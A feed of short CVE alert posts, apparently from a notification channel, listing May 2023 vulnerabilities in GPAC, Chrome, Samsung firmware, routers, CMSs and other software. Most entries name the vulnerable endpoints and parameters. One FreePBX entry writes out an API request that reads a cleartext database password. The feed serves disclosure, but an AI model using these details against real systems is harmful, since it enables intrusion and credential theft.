🚨 CVE-2023-2566Cross-site Scripting (XSS) - Stored in GitHub repository openemr/openemr prior to 7.0.1.🎖@cveNotify |
|
| 2023-05-08 06:58:13 |
🚨 CVE-2023-29944Metersphere v1.20.20-lts-79d354a6 is vulnerable to Remote Command Execution. The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench🎖@cveNotify |
|
| 2023-05-08 06:58:12 |
🚨 CVE-2023-30257A buffer overflow in the component /proc/ftxxxx-debug of FiiO M6 Build Number v1.0.4 allows attackers to escalate privileges to root.🎖@cveNotify |
|
| 2023-05-08 06:58:11 |
🚨 CVE-2023-2564OS Command Injection in GitHub repository sbs20/scanservjs prior to v2.27.0.🎖@cveNotify |
|
| 2023-05-07 16:58:14 |
🚨 CVE-2023-2564OS Command Injection in GitHub repository sbs20/scanservjs prior to v2.27.0.🎖@cveNotify |
|
| 2023-05-06 22:58:14 |
🚨 CVE-2023-29842ChurchCRM 4.5.4 endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.🎖@cveNotify |
|
| 2023-05-06 12:58:15 |
🚨 CVE-2023-2560A vulnerability was found in jja8 NewBingGoGo up to 2023.5.5.2. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228167.🎖@cveNotify |
|
| 2023-05-06 05:58:18 |
🚨 CVE-2015-10104A vulnerability, which was classified as problematic, has been found in Icons for Features Plugin 1.0.0 on WordPress. Affected by this issue is some unknown functionality of the file classes/class-icons-for-features-admin.php. The manipulation of the argument redirect_url leads to open redirect. The attack may be launched remotely. Upgrading to version 1.0.1 is able to address this issue. The name of the patch is 63124c021ae24b68e56872530df26eb4268ad633. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227756.🎖@cveNotify |
|
| 2023-05-06 05:58:17 |
🚨 CVE-2023-2428Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.13.🎖@cveNotify |
|
| 2023-05-06 05:58:16 |
🚨 CVE-2023-2235A use-after-free vulnerability in the Linux Kernel Performance Events system can be exploited to achieve local privilege escalation.The perf_group_detach function did not check the event's siblings' attach_state before calling add_event_to_groups(), but remove_on_exec made it possible to call list_del_event() on before detaching from their group, making it possible to use a dangling pointer causing a use-after-free vulnerability.We recommend upgrading past commit fd0815f632c24878e325821943edccc7fde947a2.🎖@cveNotify |
|
| 2023-05-06 00:58:20 |
🚨 CVE-2023-29350Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-05-06 00:58:19 |
🚨 CVE-2023-29354Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-05-06 00:58:18 |
🚨 CVE-2023-30065MitraStar GPT-2741GNAC-N2 with firmware BR_g5.9_1.11(WVK.0)b32 was discovered to contain a remote code execution (RCE) vulnerability in the ping function.🎖@cveNotify |
|
| 2023-05-05 23:58:42 |
🚨 CVE-2021-45111Improper access control in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote authenticated users to trigger the creation of demonstration data, including user accounts with known credentials.🎖@cveNotify |
|
| 2023-05-05 23:58:41 |
🚨 CVE-2023-28697Moxa MiiNePort E1 has a vulnerability of insufficient access control. An unauthenticated remote user can exploit this vulnerability to perform arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-05-05 23:58:40 |
🚨 CVE-2023-28008HCL Workload Automation 9.4, 9.5, and 10.1 are vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.🎖@cveNotify |
|
| 2023-05-05 23:58:36 |
🚨 CVE-2023-2550Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.13.🎖@cveNotify |
|
| 2023-05-05 23:58:35 |
🚨 CVE-2023-2552Cross-Site Request Forgery (CSRF) in GitHub repository unilogies/bumsys prior to 2.1.1.🎖@cveNotify |
|
| 2023-05-05 23:58:31 |
🚨 CVE-2023-2553Cross-site Scripting (XSS) - Stored in GitHub repository unilogies/bumsys prior to 2.2.0.🎖@cveNotify |
|
| 2023-05-05 23:58:30 |
🚨 CVE-2023-20860Spring Framework running version 6.0.0 - 6.0.6 or 5.3.0 - 5.3.25 using "**" as a pattern in Spring Security configuration with the mvcRequestMatcher creates a mismatch in pattern matching between Spring Security and Spring MVC, and the potential for a security bypass.🎖@cveNotify |
|
| 2023-05-05 23:58:29 |
🚨 CVE-2023-1078A flaw was found in the Linux Kernel in RDS (Reliable Datagram Sockets) protocol. The rds_rm_zerocopy_callback() uses list_entry() on the head of a list causing a type confusion. Local user can trigger this with rds_message_put(). Type confusion leads to `struct rds_msg_zcopy_info *info` actually points to something else that is potentially controlled by local user. It is known how to trigger this, which causes an out of bounds access, and a lock corruption.🎖@cveNotify |
|
| 2023-05-05 23:58:25 |
🚨 CVE-2022-48423In the Linux kernel before 6.1.3, fs/ntfs3/record.c does not validate resident attribute names. An out-of-bounds write may occur.🎖@cveNotify |
|
| 2023-05-05 23:58:24 |
🚨 CVE-2023-24999HashiCorp Vault and Vault Enterprise’s approle auth method allowed any authenticated user with access to an approle destroy endpoint to destroy the secret ID of any other role by providing the secret ID accessor. This vulnerability is fixed in Vault 1.13.0, 1.12.4, 1.11.8, 1.10.11 and above.🎖@cveNotify |
|
| 2023-05-05 23:58:23 |
🚨 CVE-2023-26464** UNSUPPORTED WHEN ASSIGNED **When using the Chainsaw or SocketAppender components with Log4j 1.x on JRE less than 1.7, an attacker that manages to cause a logging entry involving a specially-crafted (ie, deeply nested) hashmap or hashtable (depending on which logging component is in use) to be processed could exhaust the available memory in the virtual machine and achieve Denial of Service when the object is deserialized.This issue affects Apache Log4j before 2. Affected users are recommended to update to Log4j 2.x.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-05-05 20:58:42 |
🚨 CVE-2022-47086GPAC MP4Box v2.1-DEV-rev574-g9d5bb184b contains a segmentation violation via the function gf_sm_load_init_swf at scene_manager/swf_parse.c🎖@cveNotify |
|
| 2023-05-05 20:58:40 |
🚨 CVE-2022-3957A vulnerability classified as problematic was found in GPAC. Affected by this vulnerability is the function svg_parse_preserveaspectratio of the file scenegraph/svg_attributes.c of the component SVG Parser. The manipulation leads to memory leak. The attack can be launched remotely. The name of the patch is 2191e66aa7df750e8ef01781b1930bea87b713bb. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-213463.🎖@cveNotify |
|
| 2023-05-05 20:58:39 |
🚨 CVE-2021-32269An issue was discovered in gpac through 20200801. A NULL pointer dereference exists in the function ilst_item_box_dump located in box_dump.c. It allows an attacker to cause Denial of Service.🎖@cveNotify |
|
| 2023-05-05 20:58:37 |
🚨 CVE-2020-23930An issue was discovered in gpac through 20200801. A NULL pointer dereference exists in the function nhmldump_send_header located in write_nhml.c. It allows an attacker to cause Denial of Service.🎖@cveNotify |
|
| 2023-05-05 20:58:36 |
🚨 CVE-2022-46490GPAC version 2.1-DEV-rev505-gb9577e6ad-master was discovered to contain a memory leak via the afrt_box_read function at box_code_adobe.c.🎖@cveNotify |
|
| 2023-05-05 20:58:34 |
🚨 CVE-2022-45343GPAC v2.1-DEV-rev478-g696e6f868-master was discovered to contain a heap use-after-free via the Q_IsTypeOn function at /gpac/src/bifs/unquantize.c.🎖@cveNotify |
|
| 2023-05-05 20:58:33 |
🚨 CVE-2022-36191A heap-buffer-overflow had occurred in function gf_isom_dovi_config_get of isomedia/avc_ext.c:2490, as demonstrated by MP4Box. This vulnerability was fixed in commit fef6242.🎖@cveNotify |
|
| 2023-05-05 20:58:31 |
🚨 CVE-2022-27146GPAC mp4box 1.1.0-DEV-rev1759-geb2d1e6dd-has a heap-buffer-overflow vulnerability in function gf_isom_apple_enum_tag.🎖@cveNotify |
|
| 2023-05-05 20:58:29 |
🚨 CVE-2021-32270An issue was discovered in gpac through 20200801. A NULL pointer dereference exists in the function vwid_box_del located in box_code_base.c. It allows an attacker to cause Denial of Service.🎖@cveNotify |
|
| 2023-05-05 20:58:28 |
🚨 CVE-2021-32271An issue was discovered in gpac through 20200801. A stack-buffer-overflow exists in the function DumpRawUIConfig located in odf_dump.c. It allows an attacker to cause code Execution.🎖@cveNotify |
|
| 2023-05-05 20:58:26 |
🚨 CVE-2022-46489GPAC version 2.1-DEV-rev505-gb9577e6ad-master was discovered to contain a memory leak via the gf_isom_box_parse_ex function at box_funcs.c.🎖@cveNotify |
|
| 2023-05-05 20:58:25 |
🚨 CVE-2022-43040GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function gf_isom_box_dump_start_ex at /isomedia/box_funcs.c.🎖@cveNotify |
|
| 2023-05-05 20:58:23 |
🚨 CVE-2022-38530GPAC v2.1-DEV-rev232-gfcaa01ebb-master was discovered to contain a stack overflow when processing ISOM_IOD.🎖@cveNotify |
|
| 2023-05-05 20:58:22 |
🚨 CVE-2022-36190GPAC mp4box 2.1-DEV-revUNKNOWN-master has a use-after-free vulnerability in function gf_isom_dovi_config_get. This vulnerability was fixed in commit fef6242.🎖@cveNotify |
|
| 2023-05-05 20:58:20 |
🚨 CVE-2022-27147GPAC mp4box 1.1.0-DEV-rev1727-g8be34973d-master has a use-after-free vulnerability in function gf_node_get_attribute_by_tag.🎖@cveNotify |
|
| 2023-05-05 20:58:19 |
🚨 CVE-2022-27148GPAC mp4box 1.1.0-DEV-rev1663-g881c6a94a-master is vulnerable to Integer Overflow.🎖@cveNotify |
|
| 2023-05-05 20:58:17 |
🚨 CVE-2023-27559IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may crash when using a specially crafted subquery. IBM X-Force ID: 249196.🎖@cveNotify |
|
| 2023-05-05 20:58:16 |
🚨 CVE-2022-47092GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is contains an Integer overflow vulnerability in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8316🎖@cveNotify |
|
| 2023-05-05 20:58:15 |
🚨 CVE-2022-47094GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Null pointer dereference via filters/dmx_m2ts.c:343 in m2tsdmx_declare_pid🎖@cveNotify |
|
| 2023-05-05 20:58:14 |
🚨 CVE-2022-47095GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c🎖@cveNotify |
|
| 2023-05-05 18:58:25 |
🚨 CVE-2023-29933llvm-project commit bd456297 was discovered to contain a segmentation fault via the component mlir::Block::getArgument.🎖@cveNotify |
|
| 2023-05-05 18:58:24 |
🚨 CVE-2023-29935llvm-project commit a0138390 was discovered to contain an assertion failure at !replacements.count(op) && "operation was already replaced.🎖@cveNotify |
|
| 2023-05-05 16:58:32 |
🚨 CVE-2023-30053TOTOLINK A7100RU V7.4cu.2313_B20191024 is vulnerable to Command Injection.🎖@cveNotify |
|
| 2023-05-05 16:58:31 |
🚨 CVE-2023-30054TOTOLINK A7100RU V7.4cu.2313_B20191024 has a Command Injection vulnerability. An attacker can obtain a stable root shell through a specially constructed payload.🎖@cveNotify |
|
| 2023-05-05 16:58:30 |
🚨 CVE-2023-30434IBM Storage Scale (IBM Spectrum Scale 5.1.0.0 through 5.1.2.9, 5.1.3.0 through 5.1.6.1 and IBM Elastic Storage Systems 6.1.0.0 through 6.1.2.5, 6.1.3.0 through 6.1.6.0) could allow a local user to cause a kernel panic. IBM X-Force ID: 252187.🎖@cveNotify |
|
| 2023-05-05 16:58:29 |
🚨 CVE-2023-28473Concrete CMS (previously concrete5) before 9.2 is vulnerable to possible Auth bypass in the jobs section.🎖@cveNotify |
|
| 2023-05-05 16:58:25 |
🚨 CVE-2023-26567Sangoma FreePBX 1805 through 2302 (when obtained as a ,.ISO file) places AMPDBUSER, AMPDBPASS, AMPMGRUSER, and AMPMGRPASS in the list of global variables. This exposes cleartext authentication credentials for the Asterisk Database (MariaDB/MySQL) and Asterisk Manager Interface. For example, an attacker can make a /ari/asterisk/variable?variable=AMPDBPASS API call.🎖@cveNotify |
|
| 2023-05-05 16:58:24 |
🚨 CVE-2023-28472Concrete CMS (previously concrete5) before 9.2 does not have Secure and HTTP only attributes set for ccmPoll cookies.🎖@cveNotify |
|
| 2023-05-05 16:58:23 |
🚨 CVE-2023-30013TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.🎖@cveNotify |
|
| 2023-05-05 16:58:22 |
🚨 CVE-2023-30243Beijing Netcon NS-ASG Application Security Gateway v6.3 is vulnerable to SQL Injection via TunnelId that allows access to sensitive information.🎖@cveNotify |
|
| 2023-05-05 16:58:21 |
🚨 CVE-2022-38707IBM Cognos Command Center 10.2.4.1 could allow a local attacker to obtain sensitive information due to insufficient session expiration. IBM X-Force ID: 234179.🎖@cveNotify |
|
| 2023-05-05 16:58:20 |
🚨 CVE-2023-30843Payload is a free and open source headless content management system. In versions prior to 1.7.0, if a user has access to documents that contain hidden fields or fields they do not have access to, the user could reverse-engineer those values via brute force. Version 1.7.0 contains a patch. As a workaround, write a `beforeOperation` hook to remove `where` queries that attempt to access hidden field data.🎖@cveNotify |
|
| 2023-05-05 16:58:19 |
🚨 CVE-2023-30363vConsole v3.15.0 was discovered to contain a prototype pollution due to incorrect key and value resolution in setOptions in core.ts.🎖@cveNotify |
|
| 2023-05-05 16:58:18 |
🚨 CVE-2023-2291Static credentials exist in the PostgreSQL data used in ManageEngine Access Manager Plus (AMP) build 4309, ManageEngine Password Manager Pro, and ManageEngine PAM360. These credentials could allow a malicious actor to modify configuration data that would escalate their permissions from that of a low-privileged user to an Administrative user.🎖@cveNotify |
|
| 2023-05-05 16:58:17 |
🚨 CVE-2023-28476Concrete CMS (previously concrete5) before 9.2 is vulnerable to Stored XSS on Tags on uploaded files.🎖@cveNotify |
|
| 2023-05-05 16:58:16 |
🚨 CVE-2023-28474Concrete CMS (previously concrete5) before 9.2 is vulnerable to Stored XSS on Saved Presets on search.🎖@cveNotify |
|
| 2023-05-05 15:58:12 |
🚨 CVE-2023-21485Improper export of android application components vulnerability in VideoPreviewActivity in Call Settings to SMR May-2023 Release 1 allows physical attackers to access some media data stored in sandbox.🎖@cveNotify |
|
| 2023-05-05 06:58:35 |
🚨 CVE-2023-2459Inappropriate implementation in Prompts in Google Chrome prior to 113.0.5672.63 allowed a remote attacker to bypass permission restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-05 06:58:34 |
🚨 CVE-2023-2460Insufficient validation of untrusted input in Extensions in Google Chrome prior to 113.0.5672.63 allowed an attacker who convinced a user to install a malicious extension to bypass file access checks via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-05 06:58:33 |
🚨 CVE-2023-2462Inappropriate implementation in Prompts in Google Chrome prior to 113.0.5672.63 allowed a remote attacker to obfuscate main origin data via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-05 06:58:32 |
🚨 CVE-2023-2463Inappropriate implementation in Full Screen Mode in Google Chrome on Android prior to 113.0.5672.63 allowed a remote attacker to hide the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-05 06:58:31 |
🚨 CVE-2023-2464Inappropriate implementation in PictureInPicture in Google Chrome prior to 113.0.5672.63 allowed an attacker who convinced a user to install a malicious extension to perform an origin spoof in the security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-05 06:58:26 |
🚨 CVE-2023-2466Inappropriate implementation in Prompts in Google Chrome prior to 113.0.5672.63 allowed a remote attacker to spoof the contents of the security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-05-05 06:58:25 |
🚨 CVE-2023-2467Inappropriate implementation in Prompts in Google Chrome on Android prior to 113.0.5672.63 allowed a remote attacker to bypass permissions restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-05-05 06:58:24 |
🚨 CVE-2023-2468Inappropriate implementation in PictureInPicture in Google Chrome prior to 113.0.5672.63 allowed a remote attacker who had compromised the renderer process to obfuscate the security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-05-05 06:58:23 |
🚨 CVE-2023-2461Use after free in OS Inputs in Google Chrome on ChromeOS prior to 113.0.5672.63 allowed a remote attacker who convinced a user to enage in specific UI interaction to potentially exploit heap corruption via crafted UI interaction. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-05 06:58:18 |
🚨 CVE-2023-30122An arbitrary file upload vulnerability in the component /admin/ajax.php?action=save_menu of Online Food Ordering System v2.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.🎖@cveNotify |
|
| 2023-05-05 06:58:17 |
🚨 CVE-2023-30135Tenda AC18 v15.03.05.19(6318_)_cn was discovered to contain a command injection vulnerability via the deviceName parameter in the setUsbUnload function.🎖@cveNotify |
|
| 2023-05-05 06:58:16 |
🚨 CVE-2017-20183A vulnerability was found in External Media without Import Plugin up to 1.0.0 on WordPress. It has been declared as problematic. This vulnerability affects the function print_media_new_panel of the file external-media-without-import.php. The manipulation of the argument url/error/width/height/mime-type leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.0.1 is able to address this issue. The name of the patch is 9d2ecd159a6e2e3f710b4f1c28e2714f66502746. It is recommended to upgrade the affected component. VDB-227950 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-05 06:58:15 |
🚨 CVE-2023-2531Improper Restriction of Excessive Authentication Attempts in GitHub repository azuracast/azuracast prior to 0.18.3.🎖@cveNotify |
|
| 2023-05-04 23:58:38 |
🚨 CVE-2023-21485Improper export of android application components vulnerability in VideoPreviewActivity in Call Settings to SMR May-2023 Release 1 allows physical attackers to access some media data stored in sandbox.🎖@cveNotify |
|
| 2023-05-04 23:58:37 |
🚨 CVE-2023-21490Improper access control in GearManagerStub prior to SMR May-2023 Release 1 allows a local attacker to delete applications installed by watchmanager.🎖@cveNotify |
|
| 2023-05-04 23:58:35 |
🚨 CVE-2023-21490Improper access control in GearManagerStub prior to SMR May-2023 Release 1 allows a local attacker to delete applications installed by watchmanager.🎖@cveNotify |
|
| 2023-05-04 23:58:34 |
🚨 CVE-2023-21491Improper access control vulnerability in ThemeManager prior to SMR May-2023 Release 1 allows local attackers to write arbitrary files with system privilege.🎖@cveNotify |
|
| 2023-05-04 23:58:33 |
🚨 CVE-2023-21491Improper access control vulnerability in ThemeManager prior to SMR May-2023 Release 1 allows local attackers to write arbitrary files with system privilege.🎖@cveNotify |
|
| 2023-05-04 23:58:32 |
🚨 CVE-2023-21492Kernel pointers are printed in the log file prior to SMR May-2023 Release 1 allows a privileged local attacker to bypass ASLR.🎖@cveNotify |
|
| 2023-05-04 23:58:30 |
🚨 CVE-2023-21493Improper access control vulnerability in SemShareFileProvider prior to SMR May-2023 Release 1 allows local attackers to access protected data.🎖@cveNotify |
|
| 2023-05-04 23:58:29 |
🚨 CVE-2023-21484Improper access control vulnerability in AppLock prior to SMR May-2023 Release 1 allows local attackers without proper permission to execute a privileged operation.🎖@cveNotify |
|
| 2023-05-04 23:58:28 |
🚨 CVE-2023-21496Active Debug Code vulnerability in ActivityManagerService prior to SMR May-2023 Release 1 allows attacker to use debug function via setting debug level.🎖@cveNotify |
|
| 2023-05-04 23:58:27 |
🚨 CVE-2023-21486Improper export of android application components vulnerability in ImagePreviewActivity in Call Settings to SMR May-2023 Release 1 allows physical attackers to access some media data stored in sandbox.🎖@cveNotify |
|
| 2023-05-04 23:58:26 |
🚨 CVE-2023-21497Use of externally-controlled format string vulnerability in mPOS TUI trustlet prior to SMR May-2023 Release 1 allows local attackers to access the memory address.🎖@cveNotify |
|
| 2023-05-04 23:58:24 |
🚨 CVE-2023-21487Improper access control vulnerability in Telephony framework prior to SMR May-2023 Release 1 allows local attackers to change a call setting.🎖@cveNotify |
|
| 2023-05-04 23:58:23 |
🚨 CVE-2023-21488Improper access control vulnerablility in Tips prior to SMR May-2023 Release 1 allows local attackers to launch arbitrary activity in Tips.🎖@cveNotify |
|
| 2023-05-04 23:58:21 |
🚨 CVE-2023-21499Out-of-bounds write vulnerability in TA_Communication_mpos_encrypt_pin in mPOS TUI trustlet prior to SMR May-2023 Release 1 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-05-04 23:58:20 |
🚨 CVE-2023-21489Heap out-of-bounds write vulnerability in bootloader prior to SMR May-2023 Release 1 allows a physical attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-05-04 23:58:18 |
🚨 CVE-2023-21502Improper input validation vulnerability in FactoryTest application prior to SMR May-2023 Release 1 allows local attackers to get privilege escalation via debugging commands.🎖@cveNotify |
|
| 2023-05-04 23:58:17 |
🚨 CVE-2023-21494Potential buffer overflow vulnerability in auth api in mm_Authentication.c in Shannon baseband prior to SMR May-2023 Release 1 allows remote attackers to cause invalid memory access.🎖@cveNotify |
|
| 2023-05-04 23:58:16 |
🚨 CVE-2023-21495Improper access control vulnerability in Knox Enrollment Service prior to SMR May-2023 Release 1 allow attacker install KSP app when device admin is set.🎖@cveNotify |
|
| 2023-05-04 21:58:14 |
🚨 CVE-2023-25313OS injection vulnerability in World Wide Broadcast Network AVideo version before 12.4, allows attackers to execute arbitrary code via the video link field to the Embed a video link feature.🎖@cveNotify |
|
| 2023-05-04 18:58:24 |
🚨 CVE-2023-30184A stored cross-site scripting (XSS) vulnerability in Typecho v1.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the url parameter at /index.php/archives/1/comment.🎖@cveNotify |
|
| 2023-05-04 18:58:23 |
🚨 CVE-2023-30203Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the event_id parameter at /php-jms/result_sheet.php.🎖@cveNotify |
|
| 2023-05-04 18:58:22 |
🚨 CVE-2023-31486HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.🎖@cveNotify |
|
| 2023-05-04 18:58:21 |
🚨 CVE-2023-24033The Samsung Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080, and Exynos Auto T512 baseband modem chipsets do not properly check format types specified by the Session Description Protocol (SDP) module, which can lead to a denial of service.🎖@cveNotify |
|
| 2023-05-04 18:58:20 |
🚨 CVE-2022-26497BigBlueButton Greenlight 2.11.1 allows XSS. A threat actor could have a username containing a JavaScript payload. The payload gets executed in the browser of the victim in the "Share room access" dialog if the victim has shared access to the particular room with the attacker previously.🎖@cveNotify |
|
| 2023-05-04 18:58:16 |
🚨 CVE-2022-26498An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2.🎖@cveNotify |
|
| 2023-05-04 18:58:15 |
🚨 CVE-2023-27354This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Sonos One Speaker 70.3-35220. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of the SMB directory query command. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before reading from memory. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-19727.🎖@cveNotify |
|
| 2023-05-04 18:58:14 |
🚨 CVE-2023-27353This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Sonos One Speaker 70.3-35220. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msprox endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-19846.🎖@cveNotify |
|
| 2023-05-04 18:58:13 |
🚨 CVE-2023-29469An issue was discovered in libxml2 before 2.10.4. When hashing empty dict strings in a crafted XML document, xmlDictComputeFastKey in dict.c can produce non-deterministic values, leading to various logic and memory errors, such as a double free. This behavior occurs because there is an attempt to use the first byte of an empty string, and any value is possible (not solely the '\0' value).🎖@cveNotify |
|
| 2023-05-04 16:58:24 |
🚨 CVE-2023-29827ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.🎖@cveNotify |
|
| 2023-05-04 16:58:23 |
🚨 CVE-2023-30619Tuleap Open ALM is a Libre and Open Source tool for end to end traceability of application and system developments. The title of an artifact is not properly escaped in the tooltip. A malicious user with the capability to create an artifact or to edit a field title could force victim to execute uncontrolled code. This issue has been patched in version 14.7.99.143.🎖@cveNotify |
|
| 2023-05-04 16:58:22 |
🚨 CVE-2023-30626Jellyfin is a free-software media system. Versions starting with 10.8.0 and prior to 10.8.10 and prior have a directory traversal vulnerability inside the `ClientLogController`, specifically `/ClientLog/Document`. When combined with a cross-site scripting vulnerability (CVE-2023-30627), this can result in file write and arbitrary code execution. Version 10.8.10 has a patch for this issue. There are no known workarounds.🎖@cveNotify |
|
| 2023-05-04 16:58:21 |
🚨 CVE-2023-30627jellyfin-web is the web client for Jellyfin, a free-software media system. Starting in version 10.1.0 and prior to version 10.8.10, a stored cross-site scripting vulnerability in device.js can be used to make arbitrary calls to the `REST` endpoints with admin privileges. When combined with CVE-2023-30626, this results in remote code execution on the Jellyfin instance in the context of the user who's running it. This issue is patched in version 10.8.10. There are no known workarounds.🎖@cveNotify |
|
| 2023-05-04 15:58:12 |
🚨 CVE-2017-20184Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Carlo Gavazzi Powersoft up to version 2.1.1.1 allows an unauthenticated, remote attacker to download any file from the affected device.🎖@cveNotify |
|
| 2023-05-04 12:58:13 |
🚨 CVE-2022-4259Due to improper input validation in the Alerts controller, a SQL injection vulnerability in Nozomi Networks Guardian and CMC allows an authenticated attacker to execute arbitrary SQL queries on the DBMS used by the web application.🎖@cveNotify |
|
| 2023-05-04 12:58:12 |
🚨 CVE-2017-20184Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Carlo Gavazzi Powersoft up to version 2.1.1.1 allows an unauthenticated, remote attacker to download any file from the affected device.🎖@cveNotify |
|
| 2023-05-04 10:58:18 |
🚨 CVE-2023-22651Improper Privilege Management vulnerability in SUSE Rancher allows Privilege Escalation. A failure in the update logic of Rancher's admission Webhook may lead to the misconfiguration of the Webhook. This component enforces validation rules and security checks before resources are admitted into the Kubernetes cluster.The issue only affects users that upgrade from 2.6.x or 2.7.x to 2.7.2. Users that did a fresh install of 2.7.2 (and did not follow an upgrade path) are not affected.🎖@cveNotify |
|
| 2023-05-04 10:58:14 |
🚨 CVE-2023-1804The Product Catalog Feed by PixelYourSite WordPress plugin before 2.1.1 does not sanitise and escape the edit parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as administrators.🎖@cveNotify |
|
| 2023-05-04 10:58:13 |
🚨 CVE-2023-25934DELL ECS prior to 3.8.0.2 contains an improper verification of cryptographic signature vulnerability. A network attacker with an ability to intercept the request could potentially exploit this vulnerability to modify the body data of the request.🎖@cveNotify |
|
| 2023-05-04 10:58:12 |
🚨 CVE-2023-26125Versions of the package github.com/gin-gonic/gin before 1.9.0 are vulnerable to Improper Input Validation by allowing an attacker to use a specially crafted request via the X-Forwarded-Prefix header, potentially leading to cache poisoning.**Note:** Although this issue does not pose a significant threat on its own it can serve as an input vector for other more impactful vulnerabilities. However, successful exploitation may depend on the server configuration and whether the header is used in the application logic.🎖@cveNotify |
|
| 2023-05-04 10:58:11 |
🚨 CVE-2023-30770A stack-based buffer overflow vulnerability was found in the ASUSTOR Data Master (ADM) due to the lack of data size validation. An attacker can exploit this vulnerability to execute arbitrary code. Affected ADM versions include: 4.0.6.REG2, 4.1.0 and below as well as 4.2.0.RE71 and below.🎖@cveNotify |
|
| 2023-05-04 06:58:24 |
🚨 CVE-2023-29842ChirchCRm 4.5.4 endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.🎖@cveNotify |
|
| 2023-05-04 06:58:20 |
🚨 CVE-2023-30331An issue in the render function of beetl v3.15.0 allows attackers to execute server-side template injection (SSTI) via a crafted payload.🎖@cveNotify |
|
| 2023-05-04 06:58:19 |
🚨 CVE-2022-47757In imo.im 2022.11.1051, a path traversal vulnerability delivered via an unsanitized deeplink can force the application to write a file into the application's data directory. This may allow an attacker to save a shared library under a special directory which the app uses to dynamically load modules. Loading the library can lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-05-04 06:58:18 |
🚨 CVE-2023-27075A cross-site scripting vulnerability (XSS) in the component microbin/src/pasta.rs of Microbin v1.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2023-05-04 06:58:14 |
🚨 CVE-2023-31099Zoho ManageEngine OPManager through 126323 allows an authenticated user to achieve remote code execution via probe servers.🎖@cveNotify |
|
| 2023-05-04 06:58:13 |
🚨 CVE-2023-31484CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.🎖@cveNotify |
|
| 2023-05-04 06:58:12 |
🚨 CVE-2023-31486HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.🎖@cveNotify |
|
| 2023-05-04 00:58:34 |
